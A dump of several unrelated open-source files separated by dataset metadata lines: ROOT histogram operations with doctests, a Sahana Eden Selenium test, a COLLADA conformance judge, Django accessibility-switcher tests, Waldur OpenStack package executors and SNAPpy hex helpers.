Normalizes histos to lumi. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1,4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Fill(1,3) 1 >>> h2.Fill(2,6) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3.) >>> w3 = merge([w1, w2]) >>> w3.histo.Integral() 5.0 >>> w3.lumi 1.0 """ wrps = iterableize(wrps) histo = None info = None for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "merge accepts only HistoWrappers. wrp: " + str(wrp) ) if histo: histo.Add(wrp.histo, 1. / wrp.lumi) else: histo = wrp.histo.Clone() histo.Scale(1. / wrp.lumi) info = wrp.all_info() if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = 1. return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def prod(wrps): """ Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2, history="w1") >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Fill(1) 1 >>> h2.Fill(2) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3) >>> w3 = prod([w1, w2]) >>> w3.histo.Integral() 1.0 >>> w3.lumi 1.0 >>> w4 = wrappers.FloatWrapper(2.) >>> w5 = prod([w1, w4]) >>> w5.histo.Integral() 2.0 """ wrps = iterableize(wrps) histo = None info = None lumi = 1. for wrp in wrps: if histo: if isinstance(wrp, wrappers.HistoWrapper): histo.Multiply(wrp.histo) lumi = 1. elif not isinstance(wrp, wrappers.FloatWrapper): raise WrongInputError( "prod accepts only HistoWrappers and FloatWrappers. wrp: " + str(wrp) ) else: histo.Scale(wrp.float) lumi *= wrp.float else: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "prod expects first argument to be of type HistoWrapper. wrp: " + str(wrp) ) histo = wrp.histo.Clone() info = wrp.all_info() lumi = wrp.lumi if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def div(wrps): """ Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1,4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2) >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Fill(1,2) 1 >>> w2 = wrappers.HistoWrapper(h2, lumi=3) >>> w3 = div([w1, w2]) >>> w3.histo.Integral() 2.0 >>> w4 = wrappers.FloatWrapper(2., history="w4") >>> w5 = div([w1, w4]) >>> w5.histo.Integral() 2.0 """ wrps = iterableize(wrps) wrps = iter(wrps) try: nominator = next(wrps) denominator = next(wrps) except StopIteration: raise TooFewWrpsError("div needs exactly two Wrappers.") try: wrps.next() raise TooManyWrpsError("div needs exactly two Wrappers.") except StopIteration: pass if not isinstance(nominator, wrappers.HistoWrapper): raise WrongInputError( "div needs nominator to be of type HistoWrapper. nominator: " + str(nominator) ) if not (isinstance(denominator, wrappers.HistoWrapper) or isinstance(denominator, wrappers.FloatWrapper)): raise WrongInputError( "div needs denominator to be of type HistoWrapper or FloatWrapper. denominator: " + str(denominator) ) histo = nominator.histo.Clone() lumi = nominator.lumi if isinstance(denominator, wrappers.HistoWrapper): histo.Divide(denominator.histo) lumi = 1. else: histo.Scale(1. / denominator.float) lumi /= denominator.float info = nominator.all_info() info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def lumi(wrp): """ Applies to HistoWrapper. Returns FloatWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w2 = lumi(w1) >>> w2.float 2.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "lumi needs argument of type HistoWrapper. histo: " + str(wrp) ) info = wrp.all_info() return wrappers.FloatWrapper(wrp.lumi, **info) @add_wrp_kws @history.track_history def norm_to_lumi(wrp): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1, 4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w1.histo.Integral() 4.0 >>> w2 = norm_to_lumi(w1) >>> w2.histo.Integral() 2.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "norm_to_lumi needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() histo.Scale(1. / wrp.lumi) info = wrp.all_info() info["lumi"] = 1. return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def norm_to_integral(wrp, use_bin_width=False): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1, 4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w1.histo.Integral() 4.0 >>> w2 = norm_to_integral(w1) >>> w2.histo.Integral() 1.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "norm_to_integral needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() option = "width" if use_bin_width else "" integr = wrp.histo.Integral(option) or 1. histo.Scale(1. / integr) info = wrp.all_info() info["lumi"] /= integr return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def copy(wrp): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1, 4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w2=copy(w1) >>> w2.histo.GetName() 'h1' >>> w1.name == w2.name True >>> w1.histo.Integral() == w2.histo.Integral() True >>> w1.histo != w2.histo True """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "copy needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() info = wrp.all_info() return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def rebin(wrp, bin_bounds, norm_by_bin_width=False): """ Applies to HistoWrapper. Returns Histowrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 4, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(2) 2 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w2=rebin(w1, [.5, 2.5, 4.5]) >>> w1.histo.GetNbinsX() 4 >>> w2.histo.GetNbinsX() 2 >>> w2.histo.GetBinContent(1) 2.0 >>> w2.histo.GetBinContent(2) 0.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "rebin needs argument of type HistoWrapper. histo: " + str(wrp) ) if len(bin_bounds) < 2: raise OperationError( "Number of bins < 2, must include at least one bin!" ) bin_bounds = array.array("d", bin_bounds) orig_bin_width = wrp.histo.GetBinWidth(1) histo = wrp.histo.Rebin( len(bin_bounds) - 1, wrp.name, bin_bounds ) if norm_by_bin_width: for i in xrange(histo.GetNbinsX()+1): factor = histo.GetBinWidth(i) / orig_bin_width histo.SetBinContent(i, histo.GetBinContent(i) / factor) histo.SetBinError(i, histo.GetBinError(i) / factor) info = wrp.all_info() return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def trim(wrp, left=True, right=True): """ Applies to HistoWrapper. Returns Histowrapper. If left / right are set to values, these are applied. Otherwise empty bins are cut off. >>> from ROOT import TH1I >>> w1 = wrappers.HistoWrapper(TH1I("h1", "", 10, .5, 10.5)) >>> w1.histo.Fill(5) 5 >>> w2 = trim(w1) >>> w2.histo.GetNbinsX() 1 >>> w2.histo.GetXaxis().GetXmin() 4.5 >>> w2.histo.GetXaxis().GetXmax() 5.5 >>> w2 = trim(w1, 3.5, 7.5) >>> w2.histo.GetNbinsX() 4 >>> w2.histo.GetXaxis().GetXmin() 3.5 >>> w2.histo.GetXaxis().GetXmax() 7.5 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "trim needs argument of type HistoWrapper. histo: " + str(wrp) ) # find left / right values if not given histo = wrp.histo axis = histo.GetXaxis() n_bins = histo.GetNbinsX() if type(left) == bool: if left: for i in xrange(n_bins+1): if histo.GetBinContent(i): left = axis.GetBinLowEdge(i) break else: left = axis.GetXmin() if type(right) == bool: if right: for i in xrange(n_bins+1, 0, -1): if histo.GetBinContent(i): right = axis.GetBinUpEdge(i) break else: right = axis.GetXmax() if left > right: raise OperationError("bounds: left > right") # create new bin_bounds index = 0 while axis.GetBinLowEdge(index) < left: index += 1 bin_bounds = [axis.GetBinLowEdge(index)] while axis.GetBinUpEdge(index) <= right: bin_bounds.append(axis.GetBinUpEdge(index)) index += 1 return rebin(wrp, bin_bounds) @add_wrp_kws @history.track_history def mv_in(wrp, overflow=True, underflow=True): """ Moves under- and/or overflow bin into first/last bin. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(0) -1 >>> h1.Fill(5,3) -1 >>> w1 = wrappers.HistoWrapper(h1) >>> w1.histo.Integral() 0.0 >>> w2 = mv_in(w1, False, False) >>> w2.histo.Integral() 0.0 >>> w3 = mv_in(w1, True, False) >>> w3.histo.Integral() 3.0 >>> w4 = mv_in(w1, False, True) >>> w4.histo.Integral() 1.0 >>> w5 = mv_in(w1, True, True) >>> w5.histo.Integral() 4.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "mv_bin needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() nbins = histo.GetNbinsX() if underflow: firstbin = histo.GetBinContent(0) firstbin += histo.GetBinContent(1) histo.SetBinContent(1, firstbin) histo.SetBinContent(0, 0.) if overflow: lastbin = histo.GetBinContent(nbins + 1) lastbin += histo.GetBinContent(nbins) histo.SetBinContent(nbins, lastbin) histo.SetBinContent(histo.GetNbinsX() + 1, 0.) return wrappers.HistoWrapper(histo, **wrp.all_info()) @add_wrp_kws @history.track_history def integral(wrp, use_bin_width=False): """ Integral. Applies to HistoWrapper. Returns FloatWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(3,3) 2 >>> w1 = wrappers.HistoWrapper(h1) >>> w2 = integral(w1) >>> w2.float 4.0 >>> w3 = integral(w1, True) >>> w3.float 8.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "int needs argument of type HistoWrapper. histo: " + str(wrp) ) option = "width" if use_bin_width else "" info = wrp.all_info() return wrappers.FloatWrapper(wrp.histo.Integral(option), **info) @add_wrp_kws @history.track_history def int_l(wrp, use_bin_width=False): """ Left-sided integral. Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(3,2) 2 >>> w1 = wrappers.HistoWrapper(h1) >>> w2 = int_l(w1) >>> w2.histo.GetBinContent(1) 1.0 >>> w2.histo.GetBinContent(2) 3.0 >>> w2 = int_l(w1, True) >>> w2.histo.GetBinContent(1) 2.0 >>> w2.histo.GetBinContent(2) 6.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "int_l needs argument of type HistoWrapper. histo: " + str(wrp) ) int_histo = wrp.histo.Clone() option = "width" if use_bin_width else "" for i in xrange(int_histo.GetNbinsX(), 0, -1): error = ctypes.c_double() value = int_histo.IntegralAndError(1, i, error, option) int_histo.SetBinContent(i, value) int_histo.SetBinError(i, error.value) info = wrp.all_info() return wrappers.HistoWrapper(int_histo, **info) @add_wrp_kws @history.track_history def int_r(wrp, use_bin_width=False): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(3,2) 2 >>> w1 = wrappers.HistoWrapper(h1) >>> w2 = int_r(w1) >>> w2.histo.GetBinContent(1) 3.0 >>> w2.histo.GetBinContent(2) 2.0 >>> w2 = int_r(w1, True) >>> w2.histo.GetBinContent(1) 6.0 >>> w2.histo.GetBinContent(2) 4.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "int_r needs argument of type HistoWrapper. histo: " + str(wrp) ) int_histo = wrp.histo.Clone() option = "width" if use_bin_width else "" n_bins = int_histo.GetNbinsX() for i in xrange(1, 1 + n_bins): error = ctypes.c_double() value = int_histo.IntegralAndError(i, n_bins, error, option) int_histo.SetBinContent(i, value) int_histo.SetBinError(i, error.value) info = wrp.all_info() return wrappers.HistoWrapper(int_histo, **info) @add_wrp_kws @history.track_history def chi2(wrps, x_min=0, x_max=0): """ Expects two Histowrappers. Returns FloatWrapper. """ wrps = iterableize(wrps) wrps = iter(wrps) try: first, second = next(wrps), next(wrps) except StopIteration: raise TooFewWrpsError("chi2 needs exactly two HistoWrappers.") try: wrps.next() raise TooManyWrpsError("chi2 needs exactly two HistoWrappers.") except StopIteration: pass for w in (first, second): if not isinstance(w, wrappers.HistoWrapper): raise WrongInputError( "chi2 needs type HistoWrapper. w: " + str(w) ) if not first.histo.GetNbinsX() == second.histo.GetNbinsX(): raise WrongInputError( "chi2 needs histos with same number of bins." ) if not x_max: x_max = int(first.histo.GetNbinsX() - 1) def get_weight_for_bin(i): val = (first.histo.GetBinContent(i+1) - second.histo.GetBinContent(i+1))**2 err1 = first.histo.GetBinError(i+1) err2 = second.histo.GetBinError(i+1) if err1 and err2: return val / (err1**2 + err2**2) else: return 0. chi2_val = __builtin__.sum( get_weight_for_bin(i) for i in xrange(x_min, x_max) ) info = second.all_info() info.update(first.all_info()) return wrappers.FloatWrapper( chi2_val, **info ) @add_wrp_kws @history.track_history def eff(wrps, option=''): """ Applies to HistoWrappers only. Returns GraphWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1) 1 >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2) >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Sumw2() >>> h2.Fill(1) 1 >>> h2.Fill(1) 1 >>> h2.Fill(1) 1 >>> h2.Fill(2) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3) >>> w3 = eff([w1, w2]) >>> w3.graph.GetN() 2 >>> hi = w3.graph.GetErrorYhigh(0) >>> lo = w3.graph.GetErrorYlow(0) >>> abs(hi - 0.277375360987) < 1e-10 True >>> abs(lo - 0.414534706284) < 1e-10 True """ wrps = iterableize(wrps) wrps = iter(wrps) try: nominator = next(wrps) denominator = next(wrps) except StopIteration: raise TooFewWrpsError("eff needs exactly two Wrappers.") try: wrps.next() raise TooManyWrpsError("eff needs exactly two Wrappers.") except StopIteration: pass if not isinstance(nominator, wrappers.HistoWrapper): raise WrongInputError( "eff needs nominator to be of type HistoWrapper. nominator: " + str(nominator) ) if not (isinstance(denominator, wrappers.HistoWrapper)): raise WrongInputError( "eff needs denominator to be of type HistoWrapper. denominator: " + str(denominator) ) graph = TGraphAsymmErrors(nominator.histo, denominator.histo, option) graph.GetXaxis().SetTitle(nominator.histo.GetXaxis().GetTitle()) info = nominator.all_info() return wrappers.GraphWrapper(graph, **info) if __name__ == "__main__": import ROOT ROOT.TH1.AddDirectory(False) import doctest doctest.testmod()
gpl-3.0
8,743,581,249,339,879,000
25.882488
93
0.552413
false
flavour/ifrc_qa
modules/tests/org/create_facility.py
1
2200
""" Sahana Eden Automated Test - INV023 Create Facilty @copyright: 2011-2016 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from tests.web2unittest import SeleniumUnitTest class CreateFacility(SeleniumUnitTest): def test_inv023_create_facility(self): """ @case:INV023 @description: Create a Facility @TestDoc: https://docs.google.com/spreadsheet/ccc?key=0AmB3hMcgB-3idG1XNGhhRG9QWF81dUlKLXpJaFlCMFE @Test Wiki: http://eden.sahanafoundation.org/wiki/DeveloperGuidelines/Testing """ print "\n" self.login(account="admin", nexturl="org/facility/create") self.create("org_facility", [( "name", "International Federation of Red Cross and Red Crescent Societies"), ( "organisation_id", "Acme Suppliers"), ( "comments", "testing purpose only"), ] ) # END =========================================================================
mit
-289,334,977,569,305,600
40.509434
110
0.637727
false
KhronosGroup/COLLADA-CTS
StandardDataSets/1_5/collada/asset/coverage/geographic_location/absolute/absolute.py
1
4333
# Copyright (c) 2012 The Khronos Group Inc. # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to # the following conditions: # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Materials. # THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS. # See Core.Logic.FJudgementContext for the information # of the 'context' parameter. # This sample judging object does the following: # # JudgeBaseline: just verifies that the standard steps did not crash. # JudgeSuperior: also verifies that the validation steps are not in error. # JudgeExemplary: same as intermediate badge. # We import an assistant script that includes the common verifications # methods. The assistant buffers its checks, so that running them again # does not incurs an unnecessary performance hint. from StandardDataSets.scripts import JudgeAssistant # Please feed your node list here: tagLst = [['asset', 'coverage', 'geographic_location', 'longitude'], ['asset', 'coverage', 'geographic_location', 'latitude'], ['asset', 'coverage', 'geographic_location', 'altitude']] attrName = 'mode' attrVal = '' dataToCheck = '' class SimpleJudgingObject: def __init__(self, _tagLst, _attrName, _attrVal, _data): self.tagList = _tagLst self.attrName = _attrName self.attrVal = _attrVal self.dataToCheck = _data self.status_baseline = False self.status_superior = False self.status_exemplary = False self.__assistant = JudgeAssistant.JudgeAssistant() def JudgeBaseline(self, context): # No step should not crash self.__assistant.CheckCrashes(context) # Import/export/validate must exist and pass, while Render must only exist. self.__assistant.CheckSteps(context, ["Import", "Export", "Validate"], ["Render"]) self.status_baseline = self.__assistant.GetResults() return self.status_baseline # To pass intermediate you need to pass basic, this object could also include additional # tests that were specific to the intermediate badge. def JudgeSuperior(self, context): self.status_superior = self.status_baseline return self.status_superior # To pass advanced you need to pass intermediate, this object could also include additional # tests that were specific to the advanced badge def JudgeExemplary(self, context): # if superior fails, no point in further checking if (self.status_superior == False): self.status_exemplary = self.status_superior return self.status_exemplary # Compare the rendered images self.__assistant.CompareRenderedImages(context) self.__assistant.ElementDataPreserved(context, self.tagList[0], "float") self.__assistant.ElementDataPreserved(context, self.tagList[1], "float") self.__assistant.ElementDataPreserved(context, self.tagList[2], "float") self.__assistant.AttributePreserved(context, self.tagList[2], self.attrName) self.status_exemplary = self.__assistant.DeferJudgement(context) return self.status_exemplary # This is where all the work occurs: "judgingObject" is an absolutely necessary token. # The dynamic loader looks very specifically for a class instance named "judgingObject". # judgingObject = SimpleJudgingObject(tagLst, attrName, attrVal, dataToCheck);
mit
4,687,221,361,627,715,000
52.225
466
0.708054
false
ministryofjustice/manchester_traffic_offences_pleas
apps/plea/tests/test_accessibility_switcher.py
1
2202
from django.test import TestCase from django.test.client import Client from django.conf import settings from importlib import import_module from waffle.models import Switch class TestAccessibilitySwitcher(TestCase): def setUp(self): self.client = Client() # http://code.djangoproject.com/ticket/10899 settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file' engine = import_module(settings.SESSION_ENGINE) store = engine.SessionStore() store.save() self.session = store self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key def test_a11y_testing_waffle_switch_off(self): response = self.client.get("/set-a11y-testing/") self.assertEqual(response.status_code, 404) def test_a11y_testing_mode_tota11y(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=tota11y") response = self.client.get("/") self.assertContains(response, "/static/javascripts/vendor/tota11y.min.js") def test_a11y_testing_mode_google(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=google") response = self.client.get("/") self.assertContains(response, "/static/javascripts/vendor/axs_testing.js") def test_a11y_testing_mode_off(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=off") response = self.client.get("/") self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js") self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js") def test_a11y_testing_mode_wrong(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=gfhdjaks") response = self.client.get("/") self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js") self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js")
mit
-3,648,315,149,922,748,000
36.965517
85
0.690736
false
opennode/nodeconductor-assembly-waldur
src/waldur_mastermind/packages/executors.py
1
4271
from waldur_core.core import executors as core_executors from waldur_core.core import tasks as core_tasks from waldur_core.core import utils as core_utils from waldur_core.structure import executors as structure_executors from waldur_mastermind.packages.serializers import _get_template_quotas from waldur_openstack.openstack import executors as openstack_executors from . import tasks class OpenStackPackageCreateExecutor(core_executors.BaseExecutor): @classmethod def get_task_signature(cls, package, serialized_package, **kwargs): tenant = package.tenant serialized_tenant = core_utils.serialize_instance(tenant) service_settings = package.service_settings serialized_service_settings = core_utils.serialize_instance(service_settings) create_tenant = openstack_executors.TenantCreateExecutor.get_task_signature( tenant, serialized_tenant, **kwargs ) set_tenant_ok = openstack_executors.TenantCreateExecutor.get_success_signature( tenant, serialized_tenant ) populate_service_settings = tasks.OpenStackPackageSettingsPopulationTask().si( serialized_package ) create_service_settings = structure_executors.ServiceSettingsCreateExecutor.get_task_signature( service_settings, serialized_service_settings ) return ( create_tenant | set_tenant_ok | populate_service_settings | create_service_settings ) @classmethod def get_success_signature(cls, package, serialized_package, **kwargs): """ Get Celery signature of task that should be applied on successful execution. """ service_settings = package.service_settings serialized_service_settings = core_utils.serialize_instance(service_settings) return core_tasks.StateTransitionTask().si( serialized_service_settings, state_transition='set_ok' ) @classmethod def get_failure_signature(cls, package, serialized_package, **kwargs): return tasks.OpenStackPackageErrorTask().s(serialized_package) class OpenStackPackageChangeExecutor(core_executors.BaseExecutor): @classmethod def get_success_signature( cls, tenant, serialized_tenant, new_template, old_package, service_settings, **kwargs ): service_settings = core_utils.serialize_instance(service_settings) return tasks.LogOpenStackPackageChange().si( serialized_tenant, event='succeeded', new_package=new_template.name, old_package=old_package.template.name, service_settings=service_settings, ) @classmethod def get_failure_signature( cls, tenant, serialized_tenant, new_template, old_package, service_settings, **kwargs ): service_settings = core_utils.serialize_instance(service_settings) return tasks.LogOpenStackPackageChange().si( serialized_tenant, event='failed', new_package=new_template.name, old_package=old_package.template.name, service_settings=service_settings, ) @classmethod def get_task_signature( cls, tenant, serialized_tenant, new_template, old_package, service_settings, **kwargs ): quotas = { quota_field.name: value for quota_field, value in _get_template_quotas(new_template).items() } push_quotas = openstack_executors.TenantPushQuotasExecutor.as_signature( tenant, quotas=quotas ) serialized_new_template = core_utils.serialize_instance(new_template) serialized_old_package = core_utils.serialize_instance(old_package) serialized_service_settings = core_utils.serialize_instance(service_settings) success_package_change = tasks.OpenStackPackageSuccessTask().si( serialized_tenant, serialized_new_template, serialized_old_package, serialized_service_settings, ) return push_quotas | success_package_change
mit
-6,142,464,563,913,863,000
34.008197
103
0.656989
false
synapse-wireless/bulk-reprogramming
snappyImages/synapse/hexFunctions.py
1
1980
# Copyright (C) 2013 Synapse Wireless, Inc. # Subject to your agreement of the disclaimer set forth below, permission is given by # Synapse Wireless, Inc. ("Synapse") to you to freely modify, redistribute or include # this SNAPpy code in any program. The purpose of this code is to help you understand # and learn about SNAPpy by code examples. # BY USING ALL OR ANY PORTION OF THIS SNAPPY CODE, YOU ACCEPT AND AGREE TO THE BELOW # DISCLAIMER. If you do not accept or agree to the below disclaimer, then you may not # use, modify, or distribute this SNAPpy code. # THE CODE IS PROVIDED UNDER THIS LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTY OF # ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES # THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR # PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE # COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, # YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY # NECESSARY SERVICING, REPAIR OR CORRECTION. UNDER NO CIRCUMSTANCES WILL SYNAPSE BE # LIABLE TO YOU, OR ANY OTHER PERSON OR ENTITY, FOR ANY LOSS OF USE, REVENUE OR # PROFIT, LOST OR DAMAGED DATA, OR OTHER COMMERCIAL OR ECONOMIC LOSS OR FOR ANY # DAMAGES WHATSOEVER RELATED TO YOUR USE OR RELIANCE UPON THE SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR IF SUCH DAMAGES ARE FORESEEABLE. THIS # DISCLAIMER OF WARRANTY AND LIABILITY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. # NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER. """Hex Functions.""" def hexNibble(nibble): ''' Convert a numeric nibble 0x0-0xF to the ASCII string "0"-"F" ''' hexStr = "0123456789ABCDEF" return hexStr[nibble & 0xF] def hexByte(byte): ''' print a byte in hex - input is an integer, not a string; returns a string ''' return hexNibble(byte >> 4) + hexNibble(byte)
apache-2.0
-5,973,411,298,524,838,000
57.235294
85
0.759091
false